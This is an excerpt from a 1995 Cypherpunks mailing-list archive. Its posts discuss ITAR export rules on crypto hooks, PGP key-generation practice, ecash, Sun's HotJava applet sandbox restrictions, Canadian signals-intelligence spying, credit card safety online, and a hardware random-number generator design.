> Does anyone know the ostensible justification for this? What section of > the ITARs do they point to when they say "this is illegal"? I've perused > an online copy of ITAR (no, I haven't read all of it -- I have other > things I want to do this year :-), but I can't find a section that could > be construed to support this contention. Luckily, a lot of cryptographic materials are available outside the United States (see e.g. http://www.cs.hut.fi/crypto for pointers). If the United States chooses to restrict export of IP security products, it simply helps create a flourishing network security and other communications industry in other countries. There are already several implementations of the IP security stuff abroad - including at least one in the former Soviet Union. Tatu From s1113645 at tesla.cc.uottawa.ca Tue Nov 14 11:48:33 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Wed, 15 Nov 1995 03:48:33 +0800 Subject: BBS Generator Code Needed In-Reply-To: <199511141529.KAA04080@shell1.eznet.net> Message-ID: On Tue, 14 Nov 1995, Lloyd Bowen wrote: > Does anyone have 'C' code for the Blum-Blum-Shub PRN Generator handy? I > would rather not have to write it myself if there is tested code available. > --8^} They have one at the big motherload at Wei Dai's crypt++ also has one in C++. From rsalz at osf.org Tue Nov 14 11:52:00 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 15 Nov 1995 03:52:00 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. Message-ID: <9511141920.AA13573@sulphur.osf.org> As I said in my original message about Pegasus: The NSA consider this kind of thing "crypto with a hole" It's stupid, the hole is the crypto. But, the rest of the code is considered by the Agency to be an "ancilliary device" as defined under ITAR. 
From sameer at c2.org Tue Nov 14 11:56:52 1995 From: sameer at c2.org (sameer) Date: Wed, 15 Nov 1995 03:56:52 +0800 Subject: c2.org now accepts ecash Message-ID: <199511141926.LAA05987@infinity.c2.org> We now accept ecash: http://www.c2.org/signup.phtml -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org (or login as "guest") sameer at c2.org From black at sunflash.eng.usf.edu Tue Nov 14 12:17:24 1995 From: black at sunflash.eng.usf.edu (James Black) Date: Wed, 15 Nov 1995 04:17:24 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: <199511141758.MAA14695@jafar.sware.com> Message-ID: Hello, On Tue, 14 Nov 1995, Jeff Barber wrote: > s1113645 at tesla.cc.uottawa.ca writes: > > Does anyone know the ostensible justification for this? What section of > the ITARs do they point to when they say "this is illegal"? I've perused > an online copy of ITAR (no, I haven't read all of it -- I have other > things I want to do this year :-), but I can't find a section that could > be construed to support this contention. I scanned through the ITAR, and I agree that there doesn't seem to be anything about hooks that are illegal, but the NSA does have the authority to protect whatever threatens national security. If they are over-stepping their bounds who is going to push it to court to find out, as that is where the decision would have to be made (very expensive). Take care and have fun. James Black From fc at all.net Wed Nov 15 04:18:56 1995 From: fc at all.net (Dr. Frederick B. Cohen) Date: Wed, 15 Nov 95 04:18:56 PST Subject: Netscape rewards are an insult In-Reply-To: <199511151019.CAA18910@jobe.shell.portal.com> Message-ID: <9511151215.AA20714@all.net> > Alice here ... ... > My post detailing a structural flaw in Netscape Navigator was announced, > very quietly, to this list OVER ONE MONTH AGO. And what has been done > about it, by AT&T and/or Netscape?? Nothing. 
> > AT&T has its reputation attached to this code, as does Deutsche Telecom, > as does Netscape. The only "action" they've taken is to info-freeload and > then do absolutely, positively, definitely ... nothing. > > Diddly-squat. > > No one has taken any action whatsoever. On a closely related vein, Sun has announced that they are severely limiting some functions in HotJava - from Risks-17-45: : The paper written by the two students at Princeton describes possible : attacks on the alpha3 HotJava browser, which have all been fixed in JDK : beta. Granted, until this week, the source code for JDK beta wasn't : available, so it's understandable that they analyzed the alpha3 source base. : : We understand people need more information on the security model, and we're : taking time right now to document the security story more rigorously. A : security FAQ, an updated whitepaper, detailed user documentation and : detailed implementor's documentation are all being worked on. : : ... : : Access Control Lists are greatly restricted in beta, : as compared to the situation in the alpha3 HotJava browser. : ACLs are initialized - only once - by the applet security : manager, and are not user configurable. : : For a file not on the access control list, an applet cannot : : - check for the existence of the file : - read the file : - write the file : - check the file type : - check if the file is a directory : - check the timestamp when the file was last modified : - check the file's size : - create a directory : - rename the file : - list the files in this file (as if it were a directory) : : Applets cannot : : - create a FileInputStream : - create a RandomAccessFile, either for reading or writing : - Open file descriptors : : 2. Sockets: : : Applets cannot : : - Create socket connections other than to its own host : - Create a socket factory : : 3. 
Loading/linking: : : Applets cannot : : - Create class loaders : - Access a package in the sun.* hierarchy : - Define a new class in the java.* hierarchy : - Link dynamic libraries using System.loadLibrary() : - Disable or override the AppletSecurityManager : : 4. Process control: : : Applets cannot : : - Define native methods : - Fork processes : - Manipulate threads or thread groups outside of the : applet's thread group : - Exit the virtual machine (e.g., the browser or the appletviewer) : : 5. awt: : : Applets cannot : : - Create toplevel windows that don't have a warning banner : : ... I had a rather lengthy discussion with a gentleman from Sun at the CSI conference last Tuesday night, and this announcement follows many of the things we discussed very closely. This kind of consistency between what people say and what the company published is refreshing, and it restores my faith in Sun's desire to do things well. Of course there are still some problems left unresolved: :... : It's very difficult, if not impossible, for a web browser to completely : prevent denial of service attacks. The JDK applet API doesn't claim to : prevent denial of service attacks. A "denial of service" attack is where : someone writes an applet whose goal is to consume all available resources on : your computer, forcing you to kill the browser you're running. For example, : someone could write an applet that creates a million pop-up windows. The : windows don't do anything, but creating a million of them might use up all : the virtual memory on your computer and you'd have to kill the web browser : to reclaim the virtual memory. : : Before people engage in too much wailing and gnashing of teeth about : how applets have been too severely restricted - : : We want to enable applets to do interesting things, including making : socket connections, and reading and writing to the file system. One : way to enable that is to used a signed class loader. 
When a trusted : applet is loaded, then the applet could be granted permission to do : some of the things they are prevented from doing by default. : : The goal is to ensure that untrusted applets can't steal or damage : information on a computer running a Java-enabled browser. Later, we can : allow trusted applets to do things that untrusted applets are not allowed to : do. Since an implementation bug in a trusted applet could open a loophole : that could be exploited by an untrusted applet, design matters. :... Similarly, if your HotJava allows an insecure Postscript implementation to interpret postscript files, you're still beat. I do think that this response by Sun, regardless of the technical merits of the particulars, demonstrates a desire to improve protection and a willingness to listen. My compliments for that. -- -> See: Info-Sec Heaven at URL http://all.net Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236 From ses at tipper.oit.unc.edu Tue Nov 14 12:26:30 1995 From: ses at tipper.oit.unc.edu (Simon Spero) Date: Wed, 15 Nov 1995 04:26:30 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: <9511141920.AA13573@sulphur.osf.org> Message-ID: On Tue, 14 Nov 1995, Rich Salz wrote: > As I said in my original message about Pegasus: > The NSA consider this kind of thing "crypto with a hole" > It's stupid, the hole is the crypto. But, the rest of > the code is considered by the Agency to be an "ancilliary > device" as defined under ITAR. The interesting question is how narrow the interface has to be before it becomes in violation of the ITAR. Is the key question whether the "holes" are specifically designed for the insertion of cryptographic materials, or is it the fact that they could be used to support cryptographic enhancements? From klp at gold.tc.umn.edu Tue Nov 14 12:33:38 1995 From: klp at gold.tc.umn.edu (Kevin L Prigge) Date: Wed, 15 Nov 1995 04:33:38 +0800 Subject: Good Enough? 
Message-ID: <30a8f8836ed1002@noc.cis.umn.edu> We're looking at providing good tools for digital signatures on e-mail here, for users that are interested. We plan to make available PGP public keys in the student/staff X.500 directory, with suitable tools for retrieving keys, etc. A couple questions have come up that make me wonder what would be an acceptable service, at least given the environment that we have to work with. The first question has to do with key generation. One of the managers was of the opinion that we could do the key generation for the user, and either email or otherwise make the private key available to the user. The idea is to make it easy for the user to create their keys by providing a web interface, etc. BTW, we're running Netscapes Commerce server so we could expect at least 40 bits of protection (big deal, I know) on the passphrase transmission. The good enough part is due to the idea that we're running a couple of large multi- user machines, with all the risks those entail. Note also that we would not be keeping logs or otherwise compromising the keys ourselves, this would strictly be a user-friendly way to get people using signatures. We would also accept keys that users create themselves, this would only be one option. Second, the web of trust might also be useful, so we could sign users keys to certify them. Has anyone worked in an organization of some sort that has a structured approach to key certification using PGP? This is just in the preliminary talking stages at this point, but I thought I'd toss these 2 ideas out for comments to see what people here think. -- Kevin L. Prigge |"A computer lets you make more mistakes faster UofM Central Computing | than any invention in human history--with the email: klp at cis.umn.edu | possible exceptions of handguns and tequila." 
01001101100010110010111|- Mitch Ratcliffe From sjb at universe.digex.net Tue Nov 14 12:55:41 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Wed, 15 Nov 1995 04:55:41 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: <199511141758.MAA14695@jafar.sware.com> Message-ID: <199511142038.PAA07035@universe.digex.net> Jeff Barber writes: >Does anyone know the ostensible justification for this? What section of >the ITARs do they point to when they say "this is illegal"? I've perused >an online copy of ITAR (no, I haven't read all of it -- I have other >things I want to do this year :-), but I can't find a section that could >be construed to support this contention. I think it's 121.1, Category XIII paragraph (b) item (5): "Ancillary equipment specifically designed or modified for paragraphs (b) (1), (2), (3), (4) and (5) of this category;" From perry at piermont.com Tue Nov 14 13:19:35 1995 From: perry at piermont.com (Perry E. Metzger) Date: Wed, 15 Nov 1995 05:19:35 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: Message-ID: <199511142050.PAA05867@jekyll.piermont.com> James Black writes: > I scanned through the ITAR, and I agree that there doesn't seem to be > anything about hooks that are illegal, but the NSA does have the > authority to protect whatever threatens national security. Since when? They aren't a police agency. They have no power to arrest or prosecute, and they don't even (directly) make any decisions on any of this stuff (although they are responsible for the decisions that made). .pm From msew+ at andrew.cmu.edu Tue Nov 14 13:23:02 1995 From: msew+ at andrew.cmu.edu (Martin C Sweitzer) Date: Wed, 15 Nov 1995 05:23:02 +0800 Subject: world smartcards.. In-Reply-To: <9510200413.AA17440@sulphur.osf.org> Message-ID: Anyone know what kind of encryption they will be using... 
------------------------------------------------------------------ HP builds security for smartcard shopping ========================================= Hewlett-Packard is bidding for US government approval for a worldwide cryptographic framework, which is being to provide a security for a joint smartcard project with Gemplus and Informix. The three companies plan to develop a secure personal information card system, with which businesses can deliver services including Internet-based transactions to consumers. The encrypted cards will carry several thousand times the amount of data on current smartcards and will (pending US export approvals) be usable anywhere in the world. HP is providing server, encryption, middleware and networking technologies. Gemplus will provide advanced smart-card technology. Database and middleware technologies will come from Informix. The alliance was launched at Telecom 95. HP's proposed non-user-accessible cryptography is the first element in an international open cryptography framework, with which it hopes to deliver security technology compliant with US export regulations. From anonymous-remailer at shell.portal.com Tue Nov 14 13:24:49 1995 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Wed, 15 Nov 1995 05:24:49 +0800 Subject: [NOISE] Credit Card security in the New York Times Message-ID: <199511142050.MAA20488@jobe.shell.portal.com> On Mon, 13 Nov 1995, Nelson Minar wrote: > Today's New York Times has a nice article in the business section > about credit card security on the Internet. It's more of an editorial > than an article, but it's an editorial with the (IMNSHO) right spin: > shipping a credit card number over the Internet, even unencrypted, is > no less secure than giving it out over the phone. I haven't picked up the paper and looked at the article. 
Once in a blue moon, I might pick up the International Herald Tribune, but only on the rarest of rare circumstances, but this worries me. And it really should worry everyone who might have some interest in harm reduction. If someone in the Business Section of the New York Times is writing as you say -- writing that shipping a credit card number UNENCRYPTED over the Internet is no less secure than giving it out over the phone, then we have a SERIOUS communications/understanding gap to overcome. It seems like not only the NY Times, but the "You Will" folk at AT&T don't quite "get" it. (The AT&T swipe, is for the idjit that sent me email on postcard via bucket brigade, and then asked me to please keep it "private".) A simple understanding is necessary if we're going to use this snazzy new technology, and not kill the goose that lays the golden egg. An understanding that the NY Times, or its *experts* don't seem to have. A telephone connection goes from one point to another. It's like a football pass. An internet connection is different, it's like an old fashioned bucket brigade. Now, if you were to write a message on a football, and throw it, while there is a "risk" of interception you can be reasonably certain that the message on the ball will be "reasonably" safe while flying through the air. This is the phone call "football" analogy.. The net however does not establish a direct connection like a telephone call. It works like the old "bucket brigade" of volunteer fire departments. Your message is handed off -- handed to the next person in a chain, who then hands it to the next, and so on. Your "message" (or credit card number) is effectively written on a postcard and passed around from person to person, before it gets to your final destination. This makes it completely different than the telephone call. Orders of magnitude different. So here's the question ... and here's the comparison. 
Would you, if you were in New York, buy something with your credit card using the following payment method. Would you, write your credit card number on the back of a postcard, and leave it with your neighbour, with instructions to give to the doorman, who's supposed to flag a cabbie and tell him to take it to a building, to then give it to another doorman, who will leave it with the business next door to give to the person or business that you want to have your credit card number?? Why not?? Does this strike any reader as something really silly?? Because, this is actually the way the Internet works. This is exactly how any message, whether it's your email, or your credit card number gets from Point A to Point B. A message that is going from one computer, even to one just down the block, might end up going through twenty or thirty "hands" before being delivered. This is what makes the Internet rather unsafe, far more unsafe than a telephone call. And this lack of understanding, the lack of understanding in the press is what makes the Internet even unsafer. It is people being very cavalier. Many people trust the NY Times to "get it right", then again, the investor also trusts that these companies actually know what they're doing. The public deserves better. > The NYT has been doing a nice job covering computer issues in the past > few months, in the Monday's business section. Worth reading if you > want to keep an eye on intelligent media coverage of the net. If this is the "intelligent media coverage", then how on earth are they going to be able to cover "taking down" the Internet for some repairs?? And how are they gonna cover the inevitable, Internet crime of the century? Alice de 'nonymous ... ...just another one of those... ...hunters... P.S. This post is in the public domain. C. S. U. M. O. C. L. U. N. E. 
From sjb at universe.digex.net Tue Nov 14 13:29:36 1995 From: sjb at universe.digex.net (Scott Brickner) Date: Wed, 15 Nov 1995 05:29:36 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: Message-ID: <199511142054.PAA07674@universe.digex.net> Simon Spero writes: >The interesting question is how narrow the interface has to be before it >becomes in violation of the ITAR. Is the key question whether the "holes" >are specifically designed for the insertion of cryptographic materials, >or is it the fact that they could be used to support cryptographic >enhancements? If the ban *is* due to Category XIII (b) (5), the wording would indicate that the "hole" must be "specifically designed or modified" to support crypto. One that was specifically designed to support some sort of block compression library should be exempt under that paragraph, even if someone else were to write and distribute a crypto library with an identical interface. 'Course, IANAL, and the interpreters of the ITAR don't really seem to care what it *says*, anyway. From djw at pdcorp.com Tue Nov 14 13:38:17 1995 From: djw at pdcorp.com (Dan Weinstein) Date: Wed, 15 Nov 1995 05:38:17 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: Message-ID: <199511142110.NAA28546@email.pdcorp.com> On Tue, 14 Nov 1995 14:49:23 -0500 (EST), you wrote: >Hello, > >On Tue, 14 Nov 1995, Jeff Barber wrote: > >> s1113645 at tesla.cc.uottawa.ca writes: >> >> Does anyone know the ostensible justification for this? What section of >> the ITARs do they point to when they say "this is illegal"? I've perused >> an online copy of ITAR (no, I haven't read all of it -- I have other >> things I want to do this year :-), but I can't find a section that could >> be construed to support this contention. > > I scanned through the ITAR, and I agree that there doesn't seem to be >anything about hooks that are illegal, but the NSA does have the >authority to protect whatever threatens national security. 
If they are >over-stepping their bounds who is going to push it to court to find out, >as that is where the decision would have to be made (very expensive). > Take care and have fun. The ITAR talks about crypto components, the government is interpreting this as software that allows plug-in encryption. Dan Weinstein djw at pdcorp.com http://www.earthlink.net/~danjw PGP public key is available from my Home Page. All opinions expressed above are mine. "I understand by 'freedom of Spirit' something quite definite - the unconditional will to say No, where it is dangerous to say No. Friedrich Nietzsche From cabeen at netcom.com Tue Nov 14 13:41:38 1995 From: cabeen at netcom.com (Ted Cabeen) Date: Wed, 15 Nov 1995 05:41:38 +0800 Subject: Repeated Words/characters in Password/Phrase Message-ID: <199511142111.NAA08624@netcom17.netcom.com> Do repeated words in a PGP passphrase make the pass phrase less secure than a passphrase without any repeated words? And on the same note, do repeated letters in a UNIX password make that password easier to break? I can't seem to find anything in my books on cryptography that mention this. Thanks. _____________________________________________________________________________ Ted Cabeen cabeen at netcom.com Finger for PGP Public Key secabeen at midway.uchicago.edu "I have taken all knowledge to be my province." cococabeen at aol.com From warlord at MIT.EDU Tue Nov 14 13:46:08 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Wed, 15 Nov 1995 05:46:08 +0800 Subject: Good Enough? In-Reply-To: <30a8f8836ed1002@noc.cis.umn.edu> Message-ID: <199511142124.QAA23598@toxicwaste.media.mit.edu> Hi. First, I must warn you that generating keys on behalf of users is in general a very bad thing to do. Instead, you might want to provide a simple way for users to generate keys and get them certified. The biggest problem is that there is not an easy way to get a good set of random numbers on a server platform. 
On the other hand, users can get a great deal of randomness on their own client machines. If they can run netscape, then they can run PGP. Second, you might want to look at a paper that Jeff Schiller and I wrote for the 1995 Usenix conference on scaling the web of trust. The paper is available off my home page or via ftp: toxicwaste.mit.edu:/pub/pgpsign/scaleweb.{txt,PS} The sources to the keysigner are also in the same directory. Hope this helps. -derek Derek Atkins, SB '93 MIT EE, SM '95 MIT Media Laboratory Member, MIT Student Information Processing Board (SIPB) Home page: http://www.mit.edu:8001/people/warlord/home_page.html warlord at MIT.EDU PP-ASEL N1NWH PGP key available From harmon at tenet.edu Tue Nov 14 14:02:44 1995 From: harmon at tenet.edu (Dan Harmon) Date: Wed, 15 Nov 1995 06:02:44 +0800 Subject: data compression Message-ID: Does any one have any information about or pointers to the data compression alogrithms used by Colorado Systems and/or any other QIC backup vendors? Thanks, Dan From llurch at networking.stanford.edu Tue Nov 14 14:09:44 1995 From: llurch at networking.stanford.edu (Rich Graves) Date: Wed, 15 Nov 1995 06:09:44 +0800 Subject: ANNOUNCE: Curve Encrypt 2.2 In-Reply-To: <199511140336.UAA17922@bogart.Colorado.EDU> Message-ID: Sounds cool, but... I already have PGP on my Macs. Why would I want this? I suppose one use might be in a public lab, where a secret key and identity would be inappropriate. Or maybe to encrypt your PGP keychains if you leave them on a physically insecure hard drive (though you could use PGP conventional encryption for that). -rich From s1113645 at tesla.cc.uottawa.ca Tue Nov 14 14:13:13 1995 From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca) Date: Wed, 15 Nov 1995 06:13:13 +0800 Subject: CSE gets flak on TV Message-ID: For those who care, the Communications Security Establishment has been getting some flak for spying on Mex. during NAFTA talks and on Korea to help us sell Can. 
nuke reactors: (This rather mirrors the trouble their sister agency, the NSA, has been getting into) (sorry the online newscasts were rather vague) _________________________________________________________________ CP LOGO CANADIAN NEWS DIGEST Tuesday, Nov. 14 Electronic snooping part of the game OTTAWA (CP)--Intelligence experts say it's no big secret that Canada's high-tech spy agency snoops on friendly countries for financial gain. Increasingly, intelligence agencies around the world are using their antennas, computers and codebreakers to gather economic information, Wesley Wark, a University of Toronto history professor, said Monday. Some of Canada's largest trading partners--including the United States, France and Japan--comb the airwaves for useful information, so Canada would be foolish not to join the game, said Wark. Canada's secretive Communications Security Establishment--an arm of the Defence Department--collects and analyses communications traffic on the activities of foreign states, corporations and people. Jane Shorten, a former CSE employee, told CTV News in an interview Sunday the agency spied on Canada's allies and trading partners--including Mexico and South Korea--by eavesdropping on embassies, consulates and diplomats. ___ HEADLINE NEWS All times are Eastern Standard Time Date: Tue-14-Nov-1995, Time: 13:00 mexico and south korea are angry about reports that canada spied on them. the mexican government has filed a diplomatic note expressing its surprise and concern, and south korea has launched an inquiry. a former intelligence agent, jane shorten, says she spied on both countries, as well as japan, when she was with the communications security establishment. she says the c-s-e shifted its focus after the cold war from spying on the russians to spying on allies to get trade secrets. prime minister chretien says the organization is supposed to operate within the law. 
chretien says the c-s-e doesn't report to him on a daily basis, so he doesn't know if it was spying on anyone. From sameer at c2.org Tue Nov 14 14:34:49 1995 From: sameer at c2.org (sameer) Date: Wed, 15 Nov 1995 06:34:49 +0800 Subject: setting up an ecash shop Message-ID: <199511142206.OAA22935@infinity.c2.org> If you'd like to setup an ecash shop as a merchant, you can do it this week and have the $300 setup fee waived. (This is for the $5/month 2% movement fee account-- the most expensive one they have.) I setup my eshop at c2.org thing using the promotion. Information is at http://www.marktwain.com/promo.html (The $300 setup fee I think is outrageous, but at least this week you don't have to worry about it.) -- sameer Voice: 510-601-9777 Community ConneXion FAX: 510-601-9734 The Internet Privacy Provider Dialin: 510-658-6376 http://www.c2.org/ (or login as "guest") sameer at c2.org From frantz at netcom.com Tue Nov 14 14:40:58 1995 From: frantz at netcom.com (Bill Frantz) Date: Wed, 15 Nov 1995 06:40:58 +0800 Subject: [NOISE] Credit Card security in the New York Times Message-ID: <199511142212.OAA14291@netcom17.netcom.com> At 12:50 11/14/95 -0800, anonymous-remailer at shell.portal.com wrote: >On Mon, 13 Nov 1995, Nelson Minar wrote: > >> Today's New York Times has a nice article in the business section >> about credit card security on the Internet. It's more of an editorial >> than an article, but it's an editorial with the (IMNSHO) right spin: >> shipping a credit card number over the Internet, even unencrypted, is >> no less secure than giving it out over the phone. > >I haven't picked up the paper and looked at the article... > >If someone in the Business Section of the New York Times is writing as you >say -- writing that shipping a credit card number UNENCRYPTED over the >Internet is no less secure than giving it out over the phone, then we have >a SERIOUS communications/understanding gap to overcome. I did read the article. 
It said, "The truth is that sending a credit card number to an electronic merchant over the Internet is probably the safest way to make such a transaction. "In the last week, for example, I handed my credit card to a waiter who disappeared with it for five minutes. I faxed my credit card information to a business in New Jersey, and the fax probably lay exposed to everyone in that office for hours and perhaps to the cleaning crew that night. ... "Yes, there is a risk that someone was tapping my telephone when I read my credit card number aloud or faxed it. [reminder about cell phones deleted] A spy might have snapped a picture of my credit card with a hidden camera when I handed it to the waiter. A hacker might have intercepted my numbers as they passed through an Internet router in Hackensack, N.J. "But compared with the risk of handing my credit card to a stranger, which I do nearly every day, sending it over the Internet is pretty secure. "The real risk of sending my unencrypted number is not that some cyberspace cowboy will intercept it en route to the electronic merchant, but rather that the receiving company will store my credit information in an insecure computer. ... "My credit card number was probably among the 30,000 or so that were lifted last year from unsecured computers of Netcom ... "Willy Sutton did not mug individuals for their wallets; he robbed banks, because, as he noted, that's where the money was... "... The people who should be really nervous about electronic commerce are the banks, brokerage houses and those who do business-to-business transactions." In context, a much more reasonable view than the anonymous poster suggests. I add, that with an insurance policy (that you are forced to pay for) which broadly limits your risk to $50, you don't have to be all that careful. ----------------------------------------------------------------- Bill Frantz Periwinkle -- Computer Consulting (408)356-8506 16345 Englewood Ave. 
frantz at netcom.com Los Gatos, CA 95032, USA From rsalz at osf.org Tue Nov 14 14:49:32 1995 From: rsalz at osf.org (Rich Salz) Date: Wed, 15 Nov 1995 06:49:32 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. Message-ID: <9511142220.AA13813@sulphur.osf.org> >are specifically designed for the insertion of cryptographic materials, >or is it the fact that they could be used to support cryptographic >enhancements? Everything is decided on a case-by-case basis. I was in a meeting with some NSA export-control people (Dept Z03) and asked a few questions on this topic trying to nail down the angle of this slippery slope. Basically, generic buffer-manipulation is okay. "Keyed compression" where you explicitly passed something called a key to a DLL routine would be looked on suspiciously. An abstract set of open/modify/close routines (where open returned a pointer to opaque state, say a session key :) would be fine. The technical guy quickly grasped that I was talking about anonymous remailers, but they "conceded" there's nothing they can do about it. I say "concede" because that implies more political/control-issues than were really present at the meeting. /r$ From jya at pipeline.com Tue Nov 14 14:51:26 1995 From: jya at pipeline.com (John Young) Date: Wed, 15 Nov 1995 06:51:26 +0800 Subject: CSE gets flak on TV Message-ID: <199511142220.RAA05223@pipe9.nyc.pipeline.com> Responding to msg by s1113645 at tesla.cc.uottawa.ca () on Tue, 14 Nov 4:47 PM >For those who care, the Communications Security >Establishment has been getting some flak for spying on >Mex. during NAFTA talks and on Korea to help us sell >Can. 
nuke reactors: Here's a facet of the burgeoning counterspying, oops, biz-intel blathering, oops, globally competing, oops, leveling the playing field, oops, securing the econo-nation, oops, downsizing spies and X-spies and XX-ing spies and putting to pasture cud-chomping nincompoops of the Chomsky-contra-CIA golden-asses era: --------- The Wall Street Journal, November 14, 1995, p. A15. This Is the CEO -- Get Me the CIA [Op-Ed, excerpts] By Ernest Brod. (Mr. Brod is executive managing director of Kroll Associates, an international investigation, business intelligence and security firm based in New York.) While government policy makers ponder and debate [economic espionage] issues, U.S. companies are fighting the global competitiveness battle. In the past year U.S. companies have rushed to level the playing field with foreign competitors who have long exploited the advantage of competitor intelligence. For years, foreign-based multinationals have had teams of people devoted to learning as much as they could about their U.S. competitors. The methods ranged from in-depth research and analysis of publicly available information to covert and sometimes clumsy attempts at industrial espionage, in some cases with the active support of their government's intelligence agencies. Today, having had their consciousness raised by the global business realities of the '90s, U.S. companies in all industries are scrambling to set up units devoted to gathering strategic information about the competition. Teams can be found at both corporate and division levels; they may be multi-department or reside within planning, development, marketing, finance or international units. They may have euphemistic labels and they increasingly draw upon burgeoning numbers of outside private resources. 
In recent months, for example, my firm was asked to help determine: + Whether an Asian competitor will take advantage of the North American Free Trade Agreement to establish facilities in Mexico in order to supply the U.S. market. + How an overseas competitor with an apparently comparable cost base can consistently produce lower bids. + Who controls an overseas private company and how deep are their pockets. While the controversy continues over whether U.S. companies should be favored with government-sponsored industrial intelligence, managers are already employing legal and ethical research and investigative techniques to learn more about the methods, resources and plans of their marketplace adversaries. These forays may not be exciting, risky or glamorous enough for our battle-hardened spy masters, but they help American strategists win hard-fought ground from their adversaries. From pmonta at qualcomm.com Tue Nov 14 14:53:07 1995 From: pmonta at qualcomm.com (Peter Monta) Date: Wed, 15 Nov 1995 06:53:07 +0800 Subject: Hardware-random-bits interface Message-ID: <199511142231.OAA25441@mage.qualcomm.com> I've been thinking about physically random bits recently, so I'd like to offer a simple, easily implementable interface to a source of such bits, along with a design sketch using a common radio receiver chip as the noise source. The interface consists of two bits in the standard PC parallel port, one serving as the data line and the other the sampling clock. The parallel port, while a bit less universal than RS-232, eliminates the complexity of UARTs and clock generation and offers higher speed and friendlier local power. For an ISA bus running at 8 MHz, bits can be sampled at about 2.5 Mb/s, i.e., about 300 kB/s. (The bandwidth of the noise source should of course be consistent with this.) Another advantage of a simple device is that it can be thoroughly inspected: there is no PLD or microcontroller code to vet/trust. 
Not all parallel ports have bidirectional data registers, so the most general path is to assign a status bit to the input and use a control bit for the clock output. I'm using bit 4 of the status register (pin 13 on the PC's DB-25) as the input and bit 0 of the control register (pin 1) as the clock. Specifically, the rising edge of pin 1 should sample the noise waveform and present the result on pin 13. (Pin 1 is inverted, so bit 0 should transition from 1 to 0.) I'd also like to suggest a device name for the Unix environment, /dev/prandom, for "physically random". The intention is that the bits returned be as raw as possible, as close to the physics as possible, leaving any debiasing/hashing to other software (for example, the /dev/random implementation in recent Linux kernels). (I have a Linux device driver that implements this interface; it is very simple, needing only to sample the bits, pack them into bytes, and manage mutual exclusion, filesystem housekeeping, and probing.) Here are the particulars of the "dongle" board I'm in the process of making. Noise source: an FM/IF radio receiver chip, with no input supplied, so that the IF amplifier chain produces wideband noise at its output. I'm looking at the Motorola MC13158 and the Philips SA626. Each provides about 20 MHz of IF bandwidth, and the Motorola part has an on-chip comparator, reducing the entire device to two chips: the receiver chip and an HCMOS flip-flop. Power: from the port data lines; >=3.5V at about 20 mA is available. Device probing: the device should somehow identify itself as a random bit generator. One way to do this is to wire one of the parallel port data bits to a status line; for example, data bit 0 (pin 2) could be wired to status bit 5 (pin 12). Software can then twiddle the data bit and watch for the response. Cost: around $10 in parts, I guess. A rate of 300 kB/s will make a 600 MB one-time pad in an hour (assuming software is similarly fast). 
I'm wondering if any of the mail systems have convenient hooks to use pads (though it would not be difficult to write up). Suggestions welcome. I'll put the design on the Web once it's finished; replicating it should be pretty easy. People can also grab the device driver if they wish. Cheers, Peter Monta pmonta at qualcomm.com Qualcomm, Inc./Globalstar From jya at pipeline.com Tue Nov 14 15:36:19 1995 From: jya at pipeline.com (John Young) Date: Wed, 15 Nov 1995 07:36:19 +0800 Subject: world smartcards.. Message-ID: <199511142317.SAA11549@pipe9.nyc.pipeline.com> Responding to msg by msew+ at andrew.cmu.edu (Martin C Sweitzer) on Tue, 14 Nov 3:51 PM >Anyone know what kind of encryption they will be >using... HP's web site at has more info on the cards and the related "international cryptographic platform" being crippled and begged and groveled to USG for export. Try the site's search feature for "encryption" to poke around HP's various products, where some of the crypto to be employed is cited, if hypocryptically. From raph at CS.Berkeley.EDU Tue Nov 14 15:42:10 1995 From: raph at CS.Berkeley.EDU (Raph Levien) Date: Wed, 15 Nov 1995 07:42:10 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. In-Reply-To: <199511142110.NAA28546@email.pdcorp.com> Message-ID: <199511142322.PAA24924@kiwi.cs.berkeley.edu> I move we file a CJR on some suitable software with crypto hooks. Off the top of my head, the most plausible candidate is NCSA httpd v1.3. It's certainly software with function other than crypto. It's also the case that the crypto hooks are nearly unusable. I should know - I got quoted in USA Today for buying three CDs using these hooks ;-). Another possibility that comes to mind is Eudora. A judgement that Eudora is non-exportable is certain to piss a lot of people off. I'm not sure whether that's a good thing or a bad thing. I promise not to file a CJR without the express permission of the owners of the software. Such a CJR would certainly not be frivolous. 
It is certainly the case that the law is not clear enough for software producers to move with confidence. Further, applications with crypto hooks are much more important to the cpunk cause than are the crypto applications themselves. Face it: PGP is available to all, but very few people actively use it. Its serious usability problems are only a small part of the reason. The real reason is that people are unwilling to integrate with it because they're afraid of the export controls. By the way, I have not heard back regarding my t-shirt CJR. If I have time, I'll call them tomorrow and ask what's up. Raph From mark at unicorn.com Tue Nov 14 16:08:44 1995 From: mark at unicorn.com (Rev. Mark Grant) Date: Wed, 15 Nov 1995 08:08:44 +0800 Subject: NSA, ITAR, NCSA and plug-in hooks. Message-ID: On Tue, 14 Nov 1995, Raph Levien wrote: > I move we file a CJR on some suitable software with crypto hooks. If you want to get really warped, feel free to file a CJR for Privtool, it's a mail program with crypto hooks but no crypto, and has the added advantage of being written outside the US but still illegal to export, as far as I can tell (certainly it's now on the export-controlled section of c2.org). In fact, maybe I should file one myself, as it's a real pain to have to tell non-US users to get it from a non-US site rather than the 'official' distribution site at c2.org. Can non-US citizens do these things ? Mark From adam at lighthouse.homeport.org Tue Nov 14 16:10:34 1995 From: adam at lighthouse.homeport.org (Adam Shostack) Date: Wed, 15 Nov 1995 